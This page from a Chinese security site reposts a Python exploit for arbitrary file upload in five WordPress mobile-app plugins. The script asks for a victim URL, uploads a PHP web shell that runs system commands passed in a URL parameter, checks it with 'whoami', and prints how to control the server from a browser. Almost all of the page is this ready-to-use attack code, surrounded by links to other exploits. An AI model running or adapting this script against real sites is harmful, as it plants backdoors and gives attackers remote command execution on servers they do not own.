首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress Multiple Plugins - Arbitrary File Upload
来源:http://www.vapidlabs.com 作者:Martian 发布时间:2017-03-07  
import requests
import random
import string
print "---------------------------------------------------------------------"
print "Multiple  Wordpress Plugin - Remote File Upload Exploit\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nCWE: 434\n\n1. Zen App Mobile Native <=3.0 (CVE-2017-6104)\n2. Wordpress Plugin webapp-builder v2.0 (CVE-2017-1002002)\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4 CVE-2017-1002003)\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05 CVE-2017-1002001)\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0 (CVE-2017-1002000)\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=178\nhttp://www.vapidlabs.com/advisory.php?v=179\nhttp://www.vapidlabs.com/advisory.php?v=180\nhttp://www.vapidlabs.com/advisory.php?v=181\nhttp://www.vapidlabs.com/advisory.php?v=182"
print "---------------------------------------------------------------------"
victim = raw_input("Please Enter victim host e.g. http://example.com: ")
plug_choice=raw_input ("\n Please choose a number representing the plugin to attack: \n1. Zen App Mobile Native <=3.0\n2. Wordpress Plugin webapp-builder v2.0\n3. Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4\n4.Wordpress Plugin mobile-app-builder-by-wappress v1.05\n5. Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0\n")
if plug_choice=="1":
    plugin="zen-mobile-app-native"
elif plug_choice=="2":
    plugin="webapp-builder"
elif plug_choice=="3":
    plugin="wp2android-turn-wp-site-into-android-app"
elif plug_choice=="4":
    plugin="mobile-app-builder-by-wappress"
elif plug_choice=="5":
    plugin="mobile-friendly-app-builder-by-easytouch"
else:
    print "Invalid Plugin choice, I will now exit"
    quit() 
slug = "/wp-content/plugins/"+plugin+"/server/images.php"
target=victim+slug
def definShell(size=6, chars=string.ascii_uppercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))
 
shellName= definShell()+".php"
 
def checkExistence():
    litmusTest = requests.get(target)
    litmusState = litmusTest.status_code
    if litmusState == 200:
        print "\nTesting if vulnerable script is available\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..."
        exploit()
    else:
        print "Target has a funny code & might not be vulnerable, I will now exit\n"
        quit()
    
def exploit():
    print "\nGenerating Payload: "+shellName+"\n"
    myShell = {'file': (shellName, '<?php echo system($_GET[\'alien\']); ?>')}
    shellEmUp = requests.post(target, files=myShell)
    respShell = shellEmUp.text
    cleanURL = respShell.replace("http://example.com/",victim+"/wp-content/plugins/"+plugin+"/")
    shellLoc = cleanURL.replace(" ", "")
    print "Confirming shell upload by printing current user\n"
    shellTest=requests.get(shellLoc+"?alien=whoami")
    webserverUser=shellTest.text
    if webserverUser == "":
        print "I can't run the command can you try manually on the browser: \n"+shellLoc+"?alien=whoami"
        quit()
    else:
        print "The current webserver user is: "+webserverUser+"\n"
        print "Shell Can be controlled from the browser by running :\n"+shellLoc+"?alien=command"
        quit()
 
if __name__ == "__main__":
    checkExistence()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CyberGhost 6.0.4.2205 - Privil
·Deluge Web UI 1.3.13 - Cross-S
·Conext ComBox 865-1058 - Denia
·OpenElec 6.0.3 / 7.0.1 Code Ex
·FTPShell Client 6.53 - Buffer
·Alienvault OSSIM / USM 5.3.0 A
·Ektron 8.5 / 8.7 / 9.0 XSLT Tr
·Struts2 S2-045 Remote Command
·pfSense 2.3.2 Cross Site Reque
·Azure Data Expert Ultimate 2.2
·MikroTik Router Denial Of Serv
·Evostream Media Server 1.7.1 (
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved